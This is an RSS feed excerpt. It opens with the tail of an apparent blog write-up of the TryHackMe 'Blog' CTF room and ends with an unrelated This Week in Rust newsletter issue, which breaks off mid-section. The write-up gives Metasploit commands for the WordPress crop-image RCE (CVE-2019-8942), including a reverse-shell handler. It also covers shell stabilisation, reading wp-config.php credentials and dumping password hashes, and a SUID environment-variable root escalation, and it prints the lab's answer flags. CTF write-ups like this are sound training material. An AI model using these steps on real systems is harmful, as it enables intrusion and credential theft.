(WordPress Crop-Image RCE)</h3><h3>Understanding the Vulnerability</h3><p><strong>CVE-2019–8942</strong> affects WordPress 5.0.0 and earlier. Here’s how it works conceptually:</p><p>When WordPress manages uploaded images, it stores file references in the database as “Post Meta” entries. When cropping an image, WordPress constructs a path from this meta entry — but it doesn’t sanitize the value properly. An attacker with author-level (or higher) access can manipulate this path to point to a PHP file they control, effectively uploading a webshell.</p><p>The vulnerability was discovered by RIPSTECH and patched in WordPress 5.0.1. Our target is running 5.0.0 — right in the vulnerable range.</p><p><strong>References:</strong></p><ul><li><a href="https://www.exploit-db.com/exploits/46662">ExploitDB #46662</a> — Metasploit module</li><li><a href="https://www.exploit-db.com/exploits/49512">ExploitDB #49512</a> — Python manual exploit</li></ul><h3>Exploitation with Metasploit</h3><p>bash</p><pre>msfconsole</pre><pre>msf6 &gt; use exploit/multi/http/wp_crop_rce<br>msf6 exploit(wp_crop_rce) &gt; show options</pre><p>Set the required options:</p><p>bash</p><pre>set RHOSTS &lt;TARGET_IP&gt;<br>set LHOST &lt;YOUR_VPN_IP&gt;     # Your tun0 IP, NOT wlan0<br>set LPORT 4444<br>set USERNAME kwheel<br>set PASSWORD cutiepie1<br>set TARGETURI /<br>run</pre><blockquote><strong><em>Important:</em></strong><em> LHOST must be your TryHackMe VPN IP (</em><em>tun0), not your local network IP. Run </em><em>ip a show tun0 to confirm.</em></blockquote><p>After a moment:</p><pre>[*] Started reverse TCP handler on &lt;YOUR_IP&gt;:4444<br>[*] Authenticating with WordPress using kwheel:cutiepie1...<br>[+] Authenticated with WordPress<br>[*] Preparing payload...<br>[*] Uploading payload<br>[*] Executing the payload<br>[+] Deleted malicious post<br>[+] Deleted malicious attachment<br>[*] Sending stage (39282 bytes) to &lt;TARGET_IP&gt;<br>[+] Meterpreter session 1 opened</pre><p>We have a Meterpreter session as www-data.</p><h3>Upgrading to a Full Shell</h3><p>From Meterpreter, drop into a system shell and stabilize it:</p><p>bash</p><pre>meterpreter &gt; shell<br>python -c 'import pty; pty.spawn("/bin/bash")'<br>export TERM=xterm<br># Press Ctrl+Z, then: stty raw -echo; fg</pre><p>bash</p><pre>id<br># uid=33(www-data) gid=33(www-data) groups=33(www-data)</pre><h3>Phase 6 — Post-Exploitation &amp; Flag Hunting</h3><h3>The Rabbit Hole — /home/bjoel</h3><p>bash</p><pre>cd /home<br>ls<br># bjoel</pre><pre>cd bjoel<br>ls -la<br># -rw-r--r-- 1 bjoel bjoel   57  ... user.txt<br># -rw-r--r-- 1 bjoel bjoel  ... Billy_Joel_Termination_May20-2020.pdf</pre><p>Read user.txt:</p><pre>cat user.txt<br># You won't find what you're looking for here.<br># TRY HARDER</pre><p>Classic CTF misdirection. The user.txt here is intentionally fake. The PDF is also a lore piece: Billy Joel was "terminated" by <strong>Rubber Ducky Inc.</strong> — remember that company name. It's a hint.</p><p>The real user.txt is mounted somewhere else. We'll find it after getting root.</p><h3>wp-config.php — Database Credentials</h3><p>While exploring, check the WordPress config:</p><p>bash</p><pre>cat /var/www/wordpress/wp-config.php | grep -E "DB_NAME|DB_USER|DB_PASSWORD"</pre><p>This reveals database credentials. You can log into MySQL and inspect the wp_users table:</p><p>bash</p><pre>mysql -u wordpress -p wordpress<br>SELECT user_login, user_pass FROM wp_users;</pre><p>You’ll find two password hashes. These are bcrypt-hashed and won’t crack easily — they’re another dead end.</p><h3>Phase 7 — Privilege Escalation: The checker Binary</h3><h3>Finding SUID Files</h3><p>bash</p><pre>find / -perm -u=s -type f 2&gt;/dev/null</pre><p>Among the standard SUID binaries, one stands out:</p><pre>/usr/sbin/checker</pre><p>This is not a standard Linux binary — it’s custom-built for this machine. Owned by root, SUID set. Let’s investigate.</p><h3>Running the Binary</h3><p>bash</p><pre>/usr/sbin/checker<br># Not an Admin</pre><p>It outputs “Not an Admin” and exits. But <em>how</em> does it decide we’re not an admin?</p><h3>Analyzing with ltrace</h3><p>ltrace intercepts and displays library calls made by a program as it runs — perfect for understanding what a binary is checking without needing to decompile it.</p><p>bash</p><pre>ltrace /usr/sbin/checker</pre><p><strong>Output:</strong></p><pre>getenv("admin")                      = nil<br>puts("Not an Admin")                 = 13<br>+++ exited (status 0) +++</pre><p>That’s all we needed to know. The binary calls getenv("admin") — it checks for an environment variable named admin. If it's nil (not set), it prints "Not an Admin" and exits. The check is purely existence-based; <strong>the value doesn't matter</strong>.</p><h3>Deeper Understanding — Ghidra (Optional)</h3><p>For the curious, the binary’s decompiled C logic in Ghidra looks approximately like this:</p><p>c</p><pre>int main() {<br>    char *admin = getenv("admin");<br>    if (admin == NULL) {<br>        puts("Not an Admin");<br>        exit(0);<br>    }<br>    setuid(0);       // Set UID to root<br>    system("/bin/bash");  // Drop into bash as root<br>}</pre><p>Because the binary has the SUID bit set and is owned by root, when setuid(0) is called, it escalates our process to run as root. All we need to do is make sure the admin environment variable exists.</p><h3>Exploiting the Binary</h3><p>bash</p><pre>export admin=1<br>/usr/sbin/checker</pre><p><strong>Result:</strong></p><pre>root@blog:/home/bjoel# id<br>uid=0(root) gid=33(www-data) groups=33(www-data)</pre><p>We are root.</p><h3>Capturing root.txt</h3><p>bash</p><pre>cat /root/root.txt</pre><blockquote><em>🚩 </em><strong><em>root.txt:</em></strong><em> </em><em>9a0b2b618bef9bfa7ac28c1353d9f318</em></blockquote><h3>Phase 8 — Finding the Real user.txt</h3><p>Remember “Rubber Ducky Inc.”? The USB reference in Billy’s termination letter was pointing us here:</p><p>bash</p><pre>find / -name "user.txt" 2&gt;/dev/null</pre><p><strong>Output:</strong></p><pre>/home/bjoel/user.txt       ← the fake one<br>/media/usb/user.txt        ← the real one</pre><p>bash</p><pre>cat /media/usb/user.txt</pre><blockquote><em>🚩 </em><strong><em>user.txt:</em></strong><em> </em><em>c8421899aae571f7af486492b71a8ab7</em></blockquote><p>The USB mount at /media/usb was inaccessible to www-data, which is why we couldn't read it before gaining root. The "Rubber Ducky" and "Termination" story in the PDF was the in-lore hint that a USB drive was involved.</p><h3>Room Questions — Answered</h3><p>QuestionAnswerWhat CMS was Billy using?WordPressWhat version of the above CMS was being used?5.0Where was user.txt found?/media/usb</p><h3>Attack Chain Summary</h3><pre>Nmap → 4 ports: SSH, HTTP (WordPress 5.0), SMB<br>           ↓<br>SMB enumeration → BillySMB share → rabbit hole (steganography, no useful data)<br>           ↓<br>WPScan enumeration → users: kwheel, bjoel<br>           ↓<br>WPScan brute-force via XML-RPC → kwheel:cutiepie1<br>           ↓<br>CVE-2019-8942 (wp_crop_rce) → Meterpreter shell as www-data<br>           ↓<br>/home/bjoel/user.txt → fake flag ("TRY HARDER")<br>PDF hint → "Rubber Ducky Inc." → points to /media/usb<br>           ↓<br>SUID enumeration → /usr/sbin/checker<br>ltrace → getenv("admin") == nil check<br>export admin=1 &amp;&amp; /usr/sbin/checker → root shell<br>           ↓<br>root.txt captured from /root/<br>user.txt captured from /media/usb/</pre><h3>Lessons Learned</h3><p><strong>1. Read the lore.</strong> The PDF found in Billy’s home directory wasn’t just flavor text — “Rubber Ducky Inc.” was the hint pointing at the USB mount. CTF designers embed clues everywhere.</p><p><strong>2. Don’t trust the obvious user.txt.</strong> This room deliberately placed a fake flag to frustrate anyone who found it and thought they were done. Always verify your flags match the expected format.</p><p><strong>3. ltrace is underrated.</strong> You don’t always need Ghidra or a full decompilation to understand a binary. ltrace showed us the exact library call being made in one line. Use it before reaching for heavier tools.</p><p><strong>4. XML-RPC is a wide-open door.</strong> WordPress’s XML-RPC interface (/xmlrpc.php) allows unlimited login attempts by default — no lockout, no CAPTCHA. This makes it a far more efficient brute-force target than the login form itself.</p><p><strong>5. Environment variables as authentication is broken.</strong> The checker binary's logic is fundamentally flawed: checking for the <em>existence</em> of an environment variable (with no signature, no value check, no privilege validation) is not security — it's theater. Any code running in that shell could set the variable.</p><p><strong>6. WordPress 5.0.0 is ancient — patch your CMS.</strong> CVE-2019–8942 was disclosed in February 2019 and patched immediately in 5.0.1. Running unpatched CMS versions is one of the most common real-world attack vectors.</p><h3>Tools Used</h3><p>ToolPurposenmapPort scanning &amp; service fingerprintingsmbclientSMB share enumerationWPScanWordPress enumeration &amp; credential brute-forceMetasploit (wp_crop_rce)CVE-2019-8942 exploitationltraceDynamic binary analysisGhidraStatic binary reverse engineering (optional)findSUID file discovery &amp; flag hunting</p><h3>Flags</h3><p>FlagValueuser.txtc8421899aae571f7af486492b71a8ab7root.txt9a0b2b618bef9bfa7ac28c1353d9f318</p><p><em>Thanks for reading. If you have questions or want to discuss the manual exploitation path for CVE-2019–8942 (without Metasploit), drop a comment below.</em></p><p><em>If you found this useful, feel free to connect on </em><a href="https://linkedin.com/in/camalzads"><em>LinkedIn</em></a><em> or check out my tools on </em><a href="https://github.com/alisalive"><em>GitHub</em></a><em>.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=5220fa169761" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/tryhackme-blog-ctf-full-write-up-5220fa169761">TryHackMe — Blog CTF | Full Write-Up</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[This Week In Rust: This Week in Rust 656]]></title>
<description><![CDATA[Hello and welcome to another issue of This Week in Rust!
Rust is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
@thisweekinrust.bsky.social on Bluesky or
@ThisWeekinRu...]]></description>
<link>https://tsecurity.de/de/3606667/tools/this-week-in-rust-this-week-in-rust-656/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606667/tools/this-week-in-rust-this-week-in-rust-656/</guid>
<pubDate>Thu, 18 Jun 2026 07:08:48 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello and welcome to another issue of <em>This Week in Rust</em>!
<a href="https://www.rust-lang.org/">Rust</a> is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
<a href="https://bsky.app/profile/thisweekinrust.bsky.social">@thisweekinrust.bsky.social</a> on Bluesky or
<a href="https://mastodon.social/@thisweekinrust">@ThisWeekinRust</a> on mastodon.social, or
<a href="https://github.com/rust-lang/this-week-in-rust">send us a pull request</a>.
Want to get involved? <a href="https://github.com/rust-lang/rust/blob/main/CONTRIBUTING.md">We love contributions</a>.</p>
<p><em>This Week in Rust</em> is openly developed <a href="https://github.com/rust-lang/this-week-in-rust">on GitHub</a> and archives can be viewed at <a href="https://this-week-in-rust.org/">this-week-in-rust.org</a>.
If you find any errors in this week's issue, <a href="https://github.com/rust-lang/this-week-in-rust/pulls">please submit a PR</a>.</p>
<p>Want TWIR in your inbox? <a href="https://this-week-in-rust.us11.list-manage.com/subscribe?u=fd84c1c757e02889a9b08d289&amp;id=0ed8b72485">Subscribe here</a>.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-rust-community">Updates from Rust Community</a></h4>

<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#projecttooling-updates">Project/Tooling Updates</a></h5>
<ul>
<li><a href="https://arxiv.org/abs/2606.15991">cuTile Rust - Fearless Concurrency on the GPU, memory-safe, data-race-free GPU kernels, B200 benchmarks</a></li>
<li><a href="https://www.iroh.computer/blog/v1">Iroh 1.0 - Dial Keys, not IPs</a></li>
<li><a href="https://manishearth.github.io/blog/2026/06/14/diplomat-multi-language-ffi-for-rust-libraries/">Diplomat - Multi-language FFI for Rust libraries</a></li>
<li><a href="https://sergey-melnychuk.github.io/2026/05/23/yevm/">I built EVM from scratch. Again.</a></li>
<li><a href="https://zelanton.github.io/processkit/">processkit 1.0 - async process tree management</a></li>
<li><a href="https://github.com/obazin/litchee/releases/tag/v0.1.0">litchee: Rust Lichess API client</a></li>
<li><a href="https://jolars.co/blog/2026-06-10-basin/">Basin - Numerical Optimization in Rust</a></li>
<li><a href="https://github.com/carboxyl-rs/carboxyl/releases/tag/v0.1.0-servo-rc.1">Carboxyl 0.1.0-rc - A servo-based browser for the terminal</a></li>
<li><a href="https://github.com/kunobi-ninja/kache/releases/tag/v0.6.0">kache 0.6.0 - a shareable Rust + C/C++ build cache</a></li>
<li><a href="https://github.com/GianIac/numax/releases/tag/v0.1.0">numax v0.1.0 - first stable release of the numax distributed WASM runtime</a></li>
<li><a href="https://dev.to/etoile_bleu/-i-built-a-sync-engine-for-clinics-that-run-on-2g-and-lose-power-mid-transfer-here-is-why-and-18od">ZamSync - offline-first Rust sync engine</a></li>
<li><a href="https://dev.to/phpcraftdream/ktav-i-got-fed-up-with-every-config-format-so-i-built-one-with-no-quotes-no-commas-no-54an">Ktav - a quote-free config format</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#observationsthoughts">Observations/Thoughts</a></h5>
<ul>
<li><a href="https://trifectatech.org/blog/zlib-rs-in-firefox/">zlib-rs in Firefox</a></li>
<li><a href="https://corrode.dev/blog/rust-prevents-data-races-not-race-conditions/">Rust Prevents Data Races, Not Race Conditions</a></li>
<li><a href="https://fnordig.de/2026/06/16/build-your-project-zig-style/">Build your project Zig-style</a></li>
<li><a href="https://kobzol.github.io/rust/2026/06/15/how-memory-safety-cves-differ-between-rust-and-c-cpp.html">How memory safety CVEs differ between Rust and C/C++</a></li>
<li><a href="https://kerkour.com/stdx-cratesio">Why stdx is not on crates.io</a></li>
<li>[videos] <a href="https://www.youtube.com/watch?v=PrfMpCaIh0k&amp;list=PL8Q1w7Ff68DBpmF38rcIAf8Z9Gj2TnlgM">RustWeek 2026 by RustNL, all talks playlist</a></li>
<li><a href="https://www.p2claw.com/blog/2026-06-09-the-ipad-was-on-tailscale/">The iPad was on Tailscale</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-walkthroughs">Rust Walkthroughs</a></h5>
<ul>
<li><a href="https://blog.sheerluck.dev/posts/learn-rust-concurrency-by-building-a-thread-pool/">Learn Rust Concurrency By Building a Thread Pool</a></li>
<li><a href="https://grack.com/blog/2026/06/11/life-before-main/">There Is Life Before Main in Rust</a></li>
<li><a href="https://wolfgirl.dev/blog/2026-06-16-async-task-locals-from-scratch/">Async Task Locals From Scratch</a></li>
<li><a href="https://dystroy.org/blog/picomobile/">Fearless Embedded Rust: Driving a Lego Car with a Pico W</a></li>
<li><a href="https://smista.ai/blog/how-we-built-a-provider-agnostic-llm-layer-in-rust-with-rig">Building a provider-agnostic LLM layer in Rust with Rig</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#miscellaneous">Miscellaneous</a></h5>
<ul>
<li>[video] <a href="https://2026.rustweek.org/blog/2026-06-10-rustweek-recordings-published/">RustWeek 2026 talk recordings</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#crate-of-the-week">Crate of the Week</a></h4>
<p>This week's crate is <a href="https://github.com/ArneCode/marser">marser</a>, a parser combinator library with a twist.</p>
<p>Thanks to <a href="https://users.rust-lang.org/t/crate-of-the-week/2704/1611">Arne Code</a> for the self-suggestion!</p>
<p><a href="https://users.rust-lang.org/t/crate-of-the-week/2704">Please submit your suggestions and votes for next week</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#calls-for-testing">Calls for Testing</a></h4>
<p>An important step for RFC implementation is for people to experiment with the
implementation and give feedback, especially before stabilization.</p>
<p>If you are a feature implementer and would like your RFC to appear in this list, add a
<code>call-for-testing</code> label to your RFC along with a comment providing testing instructions and/or
guidance on which aspect(s) of the feature need testing.</p>
<p><em>No calls for testing were issued this week by
<a href="https://github.com/rust-lang/rust/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rust</a>,
<a href="https://github.com/rust-lang/cargo/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/rustup/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rustup</a> or
<a href="https://github.com/rust-lang/rfcs/issues?q=label%3Acall-for-testing%20state%3Aopen">Rust language RFCs</a>.</em></p>
<p><a href="https://github.com/rust-lang/this-week-in-rust/issues">Let us know</a> if you would like your feature to be tracked as a part of this list.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#call-for-participation-projects-and-speakers">Call for Participation; projects and speakers</a></h4>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-projects">CFP - Projects</a></h5>
<p>Always wanted to contribute to open-source projects but did not know where to start?
Every week we highlight some tasks from the Rust community for you to pick and get started!</p>
<p>Some of these tasks may also have mentors available, visit the task page for more information.</p>


<ul>
<li><a href="https://github.com/satyakwok/solana-infra-doctor/issues/77">solana-infra-doctor - List exit codes in <code>sol-doctor --help</code></a></li>
<li><a href="https://github.com/satyakwok/solana-infra-doctor/issues/78">solana-infra-doctor - Make the invalid-URL error suggest the expected scheme</a></li>
<li><a href="https://github.com/satyakwok/solana-infra-doctor/issues/79">solana-infra-doctor - Add a glossary of RPC readiness terms</a></li>
<li><a href="https://github.com/MrSheerluck/openslate/issues/38">openslate - add unit tests for slugify() in api/src/notes.rs</a></li>
<li><a href="https://github.com/MrSheerluck/openslate/issues/70">openslate - add integration tests for notes CRUD in api/src/notes.rs</a></li>
<li><a href="https://github.com/MrSheerluck/openslate/issues/96">openslate - add integration tests for auth flow in api/src/users.rs</a></li>
<li><a href="https://github.com/MrSheerluck/openslate/issues/89">openslate - add unit tests for build_fts_query() in api/src/search.rs</a></li>
<li><a href="https://github.com/MrSheerluck/openslate/issues/106">openslate - add integration tests for auth middleware and logout in api/src/auth.rs</a></li>
<li><a href="https://github.com/MrSheerluck/openslate/issues/85">openslate - add integration tests for media endpoints (DB layer) in api/src/media.rs</a></li>
<li><a href="https://github.com/MrSheerluck/openslate/issues/40">openslate - add unit tests for ext_from_mime() and filename_from_url() in api/src/media.rs</a></li>
</ul>


<p>If you are a Rust project owner and are looking for contributors, please submit tasks <a href="https://github.com/rust-lang/this-week-in-rust?tab=readme-ov-file#call-for-participation-guidelines">here</a> or through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-events">CFP - Events</a></h5>
<p>Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.</p>



<p>If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-the-rust-project">Updates from the Rust Project</a></h4>
<p>527 pull requests were <a href="https://github.com/search?q=is%3Apr+org%3Arust-lang+is%3Amerged+merged%3A2026-06-09..2026-06-16">merged in the last week</a></p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler">Compiler</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/156187"><code>obligations_for_self_ty</code>: skip irrelevant goals (recompute <code>sub_root</code> from <code>stalled_vars)</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157768"><code>codegen_ssa</code>: peel trans. wrappers on scalable vecs</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/156934">add a check for impossible predicates to <code>trivial_const</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/156816">add unstable loop unrolling hint attributes</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157714">improve polymorphization of raw pointer formatting</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/155200">introduce <code>#[diagnostic::on_type_error(message)]</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157781">perf: reuse green-marking's edge walk when promoting a node</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#library">Library</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/157355">add <code>or_try_*</code> variants for <code>HashMap</code> and <code>BTreeMap</code> Entry APIs</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/149749">make <code>BorrowedBuf</code> and <code>BorrowedCursor</code> generic over the data</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/155527">replace printables table with <code>unicode_data.rs</code> tables</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157876">stabilize <code>#![feature(box_as_ptr)]</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/156629">stabilize <code>core::range::{legacy, RangeFull, RangeTo}</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/152544">stabilize <code>int_format_into</code> feature</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157877">stabilize <code>nonzero_from_str_radix</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157029">stabilize feature <code>float_algebraic</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cargo">Cargo</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/cargo/pull/17104"><code>trim-paths</code>: emit <code>CARGO_TRIM_PATHS_REMAP</code> for build.rs</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17101"><code>diag</code>: Give diagnostics the same display path behavior as rustc</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17095"><code>diag</code>: Report all errors, in order</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17071"><code>publish</code>: avoid false deadlock when <code>to_confirm</code> is non-empty</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17083"><code>resolver</code>: move yank policy to resolver layer</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rustdoc">Rustdoc</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/141000">also run lint <code>unused_doc_comments</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157874">cleanup and (micro-)optimize <code>print_where_clause</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157740">correct doctest span for trailing semicolon after item</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157838">don't strip hidden items in <code>AliasedNonLocalStripper</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157796">some more lazy formatting</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rustfmt">Rustfmt</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rustfmt/pull/6616">add <code>doc_comment_code_block_small_heuristics</code>, to override <code>use_small_heuristics</code> in doc code</a></li>
<li><a href="https://github.com/rust-lang/rustfmt/pull/6935">stabilize <code>hex_literal_case</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#clippy">Clippy</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17042">new <code>by_ref_peekable_peek</code> lint</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17192">add <code>with_capacity_zero</code> lint</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17191"><code>mem_replace_with_default</code>: also emit inside macros</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17175"><code>infallible_destructuring_match</code>: clean-up, split off the suggestion from the main message</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17184"><code>manual_is_variant_and</code>: lint <code>result.ok().is_some_and(f)</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17171"><code>needless_borrow</code>: same-name methods false positive</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17216"><code>unnecessary_lazy_evaluations</code>: handle closure <code>-&gt;</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17208">deprecate the <code>from_iter_instead_of_collect</code> lint</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17204">remove <code>is_integer_const</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17250">do not trigger <code>ref_patterns</code> lint on automatically derived code</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17145">enhance never loop</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/15779">add profile-specific configuration for disallowed methods and types</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16749">fix <code>collapsible_match</code> suggests wrongly when match body has no braces</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16868">fix <code>unnecessary_sort_by</code> reverse suggestion using wrong closure parameter name</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17107">fix redundant closure call async false positive</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17218">perf: check <code>is_in_test</code> last in <code>incompatible_msrv</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17219">perf: check the token kind before extracting source in early literal lints</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17220">perf: match expression shape before MSRV check in <code>cloned_ref_to_slice_refs</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17217">perf: skip <code>doc_markdown</code> text collection and word scan when the lint is allowed</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17225">perf: skip <code>single_component_path_imports</code> module walk when nothing to lint</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-analyzer">Rust-Analyzer</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22562">create directory for <code>cargo xtask metrics rustc_tests</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22575">don't count C-variadic <code>...</code> as a parameter for fn pointers</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22549">support flyimport exclude variants</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22566">fix destructuring assignments not introducing moves</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22584">offer inline macro in macro call and proc macro</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22591">prefer bench command when target is bench to avoid cargo run</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22551">supports inline variable in macro</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22574">use package id as argument to <code>--package</code> if package is not unique</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22545">assist <code>inline_type_alias</code> work on ADT definitions</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22579">perf: defer initial workspace flycheck until cache priming completes</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22561">remove docs about removed <code>analysis-bench</code> command</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22571">remove unnecessary feature flags from tests</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22585">use ASCII lowercase for dylib extensions check</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-compiler-performance-triage">Rust Compiler Performance Triage</a></h5>
<p>This week we had quite a lot of changes, a few small regressions that were a bit tough to diagnose, but the week is largely positive, overall.
Notably, we got one massive improvement on the next-solver benchmark in #<a href="https://github.com/rust-lang/rust/pull/156187">156187</a>,
and a nice speedup for incremental in <a href="https://github.com/rust-lang/rust/pull/157781">#157781</a>.</p>
<p>Triage done by <strong>@panstromek</strong>.
Revision range: <a href="https://perf.rust-lang.org/?start=f3ef3bd882dd24a275a60701a67c3bb330edd8c1&amp;end=b5d46ecb51c3e4134b82570cfe718f093daa6390&amp;absolute=false&amp;stat=instructions%3Au">f3ef3bd8..b5d46ecb</a></p>
<p><strong>Summary</strong>:</p>
<table>
<thead>
<tr>
<th>(instructions:u)</th>
<th>mean</th>
<th>range</th>
<th>count</th>
</tr>
</thead>
<tbody>
<tr>
<td>Regressions ❌ <br> (primary)</td>
<td>0.4%</td>
<td>[0.2%, 0.6%]</td>
<td>22</td>
</tr>
<tr>
<td>Regressions ❌ <br> (secondary)</td>
<td>0.5%</td>
<td>[0.1%, 2.0%]</td>
<td>40</td>
</tr>
<tr>
<td>Improvements ✅ <br> (primary)</td>
<td>-1.8%</td>
<td>[-5.9%, -0.1%]</td>
<td>125</td>
</tr>
<tr>
<td>Improvements ✅ <br> (secondary)</td>
<td>-3.8%</td>
<td>[-69.4%, -0.1%]</td>
<td>90</td>
</tr>
<tr>
<td>All ❌✅ (primary)</td>
<td>-1.5%</td>
<td>[-5.9%, 0.6%]</td>
<td>147</td>
</tr>
</tbody>
</table>
<p>1 Regression, 4 Improvements, 8 Mixed; 5 of them in rollups
28 artifact comparisons made in total</p>
<p><a href="https://github.com/rust-lang/rustc-perf/blob/d36b1ad8679b65efbb98252fbb93f72a7d90d4c6/triage/2026/2026-06-16.md">Full report here</a></p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#approved-rfcs"></a><a href="https://github.com/rust-lang/rfcs/commits/master">Approved RFCs</a></h5>
<p>Changes to Rust follow the Rust <a href="https://github.com/rust-lang/rfcs#rust-rfcs">RFC (request for comments) process</a>. These
are the RFCs that were approved for implementation this week:</p>
<ul>
<li><em>No RFCs were approved this week.</em></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#final-comment-period">Final Comment Period</a></h5>
<p>Every week, <a href="https://www.rust-lang.org/team.html">the team</a> announces the 'final comment period' for RFCs and key PRs
which are reaching a decision. Express your opinions now.</p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#tracking-issues-prs">Tracking Issues &amp; PRs</a></h6>
